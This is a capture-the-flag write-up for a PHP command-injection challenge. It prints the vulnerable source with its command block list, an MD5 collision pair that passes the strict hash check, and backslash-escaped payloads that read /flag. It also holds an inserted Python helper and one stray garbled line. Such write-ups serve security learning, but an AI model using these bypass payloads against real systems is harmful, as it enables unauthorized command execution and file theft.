<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens as shown, with the URL parameters ?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= ; view the page source at the same time.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" string here, which suggests the challenge most likely involves MD5.</p>
<p>Then I captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode the img value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode the result still looks like base64, so decode it once more.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Hex-decoding that then gives:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way, run in reverse (hex, then base64 twice):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then enter it in the address bar.</p>
<p>Then view the page source and decode the base64 string it contains:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
    body{
        background:url(./bj.png) no-repeat center center;
        background-size:cover;
        background-attachment:fixed;
        background-color:#CCCCCC;
    }
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
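<p>A Python mirror of the img handling in the source above, added here as an example (it is not the challenge's or the write-up's code): it reverses the hex-then-double-base64 encoding that produced 555.png and index.php, and reproduces the filename sanitizer and the /flag/i check, which together are why the flag cannot be fetched through img and the write-up moves on to cmd.</p>

```python
import base64
import binascii
import re

# Added example, not code from the write-up or the challenge. It mirrors the
# img handling of the PHP source above:
#   $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
#   $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
#   if (preg_match("/flag/i", $file)) die("xixi~ no flag");

def _b64decode_lenient(data: str) -> bytes:
    """PHP's base64_decode tolerates missing '=' padding (the img value in the
    URL has none); Python's does not, so pad before decoding."""
    return base64.b64decode(data + "=" * (-len(data) % 4))

def decode_img(param: str) -> str:
    """Reverse the double-base64 + hex encoding of the img parameter."""
    hex_text = _b64decode_lenient(_b64decode_lenient(param).decode())
    return binascii.unhexlify(hex_text).decode()

def encode_img(filename: str) -> str:
    """Build the img value for a filename: hex, then base64 twice."""
    hex_text = binascii.hexlify(filename.encode())
    return base64.b64encode(base64.b64encode(hex_text)).decode()

def sanitize_filename(file: str) -> str:
    """Mirror of preg_replace("/[^a-zA-Z0-9.]+/", "", $file): every character
    outside [a-zA-Z0-9.] is dropped, so '/' never reaches file_get_contents
    and the read cannot leave the script's own directory."""
    return re.sub(r"[^a-zA-Z0-9.]+", "", file)

def would_serve(param: str) -> bool:
    """True if the challenge would reach file_get_contents for this img value:
    the sanitized name must not match /flag/i."""
    name = sanitize_filename(decode_img(param))
    return re.search(r"flag", name, re.IGNORECASE) is None

if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))  # 555.png
    print(encode_img("index.php"))                     # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    print(would_serve(encode_img("flag.php")))         # False
```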
<p>Combined with the earlier inference, the key code is:</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check is the strong-collision case: the (string) casts and === rule out the usual type-juggling tricks, so a and b must be two different strings with the same MD5 hash.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>Just these two values are enough to get the contents of cmd treated as a command.</p>
<p>So the payload used is:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p> </p>& C& T6 Z; A. s; M F6 N$ D
<p>Because '\' is not blocked, the filter can be bypassed this way:</p>
<p>ls and l\s produce the same result when executed.</p>
<p>Then I found /flag in the root directory.</p>
<p>So the payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not blocked,</p>
<p>dir can also be used in place of ls for listing, and sort in place of cat.</p>